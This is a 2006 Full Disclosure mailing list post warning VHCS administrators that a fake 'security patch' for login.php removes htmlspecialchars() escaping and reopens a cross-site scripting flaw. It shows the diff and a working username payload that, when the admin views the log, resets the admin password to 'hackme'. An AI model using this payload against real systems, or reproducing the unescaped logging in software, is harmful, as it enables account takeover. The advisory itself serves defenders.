Full Disclosure mailing list archives
VHCS Security Patch - 2006-02-05 --> Fake!
From: Roman Medina-Heigl Hernandez <roman () rs-labs com>
Date: Sun, 05 Feb 2006 21:09:11 +0100
Hi, I've just visited VHCS main page and noticed the following "security patch": http://vhcs.net/new/modules/news/article.php?storyid=23 It reads: "This patch is for all VHCS versions. You have to update only one GUI file - /vhcs2/gui/include/login.php Just replace the file " Well, just do NOT apply it!!!! It's a fake! Indeed it will leave your VHCS installation vulnerable to a high severity cross-site-scripting issue! See it: login_orig_unix.php --> original 2.4.7.1 login.php (converted to Unix) login_new_unix.php --> login.php from "security patch" roman@rs-labs:~$ diff login_orig_unix.php login_new_unix.php 38c38 < write_log("Login error, <b><i>".htmlspecialchars($uname, ENT_QUOTES, "UTF-8")."</i></b> unknown username"); ---
write_log("Login error, <b><i>".$uname."</i></b> unknown
username"); 75c75 < write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." Domain status is not OK - user can not login"); ---
write_log( $uname." Domain status is not OK - user can not login"); 104c104 < write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." user logged in."); ---
write_log( $uname." user logged in.");
112c112 < write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." bad password login data."); ---
write_log( $uname." bad password login data.");
190c190 < write_log(htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." user session timed out"); ---
write_log($uname." user session timed out");
199c199 < write_log(htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." bad session data."); ---
write_log($uname." bad session data.");
258a259
die();
261a263
}
437c439 < } ---
//}
roman@rs-labs:~$ As you can see, the "patch" removes htmlspecialchars() calls letting login.php vulnerable . Nasty... If you apply the "patch" (or have an old VHCS install, for instance version <= 2.4.6.2), the XSS bug is active. Just for fun, you can exploit it by entering the following as "username" (in the login entry page): </form><form name="dsr" method="post" action="ch%61nge_password.php"><input name="pass" value="hackme"><input name="pass_rep" value="hackme"><input name="uaction" value="updt_pass"></form><script>document.dsr.submit()</script> When the VHCS admin enters the "Admin Log" page (in VHCS menu)... his password will be set up to "hackme" :-) The %61 trick is necessary to bypass some string substitution. This exploit combines the XSS bug with what I see as a poor security design bug, which is letting change password without supplying the old one (Alex, please, fix it in next release!). Summarizing, my recommendation: use VHCS 2.4.7.1, don't apply patch. -- Cheers, -Roman PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742 [Key ID: 0xEAD56742. Available at KeyServ] _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- VHCS Security Patch - 2006-02-05 --> Fake! Roman Medina-Heigl Hernandez (Feb 05)
- Message not available
- Re: VHCS Security Patch - 2006-02-05 --> Fake! Roman Medina-Heigl Hernandez (Feb 05)
- Message not available
- Re: VHCS Security Patch - 2006-02-05 --> Fake! Roman Medina-Heigl Hernandez (Feb 07)
- Re: VHCS Security Patch - 2006-02-05 --> Fake! Roman Medina-Heigl Hernandez (Feb 05)
- Message not available